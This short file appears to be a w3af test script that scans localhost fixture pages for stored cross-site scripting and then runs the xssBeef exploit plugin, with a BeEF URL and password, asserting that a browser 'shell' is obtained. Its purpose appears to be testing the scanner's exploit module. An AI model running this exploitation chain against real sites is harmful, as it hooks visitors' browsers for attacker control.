# permanent xss exploit using beef

plugins
output console,textFile
output config textFile
set fileName output-w3af.txt
set verbose True
back
output config console
set verbose False
back

audit xss
back

target
set target http://localhost/w3af/audit/xss/stored/writer.php?a=abc , http://localhost/w3af/audit/xss/stored/reader.php
back

start

exploit
exploit config xssBeef
set beefURL http://localhost/beef/
set beefPasswd BeEFConfigPass
view
back
exploit xssBeef

back

assert len( kb.kb.getData('xssBeef','shell') ) == 1

exit